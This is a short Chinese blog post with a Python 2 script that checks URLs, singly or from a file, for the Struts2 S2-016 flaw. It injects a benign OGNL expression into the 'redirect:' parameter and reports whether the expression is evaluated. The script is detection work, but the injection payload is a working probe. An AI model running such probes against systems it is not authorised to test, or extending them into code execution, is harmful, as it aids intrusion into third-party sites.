前两天泛滥了Struts 的漏洞利用工具, 可参考
S2-016 和
Struts2再爆远程代码执行漏洞 , 当时写了一个很简单的 python 程序用来检测 url 是否存在此漏洞.
#!/usr/bin/env python
#coding=utf-8
'''
author: zz_d
date: 2013-07-17
'''
import sys
import urllib
import getopt
def help():
print '%s [-f urlfile] [-u url] [-h]' % sys.argv[0]
def struts_test(url):
turl = '%s?redirect:%%25{3*4}' % url
rurl = '%s/12' % url[:url.rfind('/')]
ur = urllib.urlopen(turl)
if rurl == ur.url.split(';')[0]:
ur.close()
return True
ur.close()
return False
if __name__ == "__main__":
url = None
urlfile = None
try:
opts, args = getopt.getopt(sys.argv[1:], 'f:u:h')
except getopt.GetoptError as err:
print str(err)
help()
sys.exit(-1)
for t, a in opts:
if t == '-f':
urlfile = a
if t == '-u':
url = a
if t == '-h':
help()
sys.exit(0)
if not url and not urlfile:
help()
sys.exit(-1)
if url:
if struts_test(url):
print '%s is Vul' % url
if urlfile:
fs = open(urlfile, 'r')
for line in fs:
line = line.strip()
if line:
if struts_test(line):
print '%s is Vul' % line
使用时, url 设置为 "http://www.example.com/abc.action" 的形式.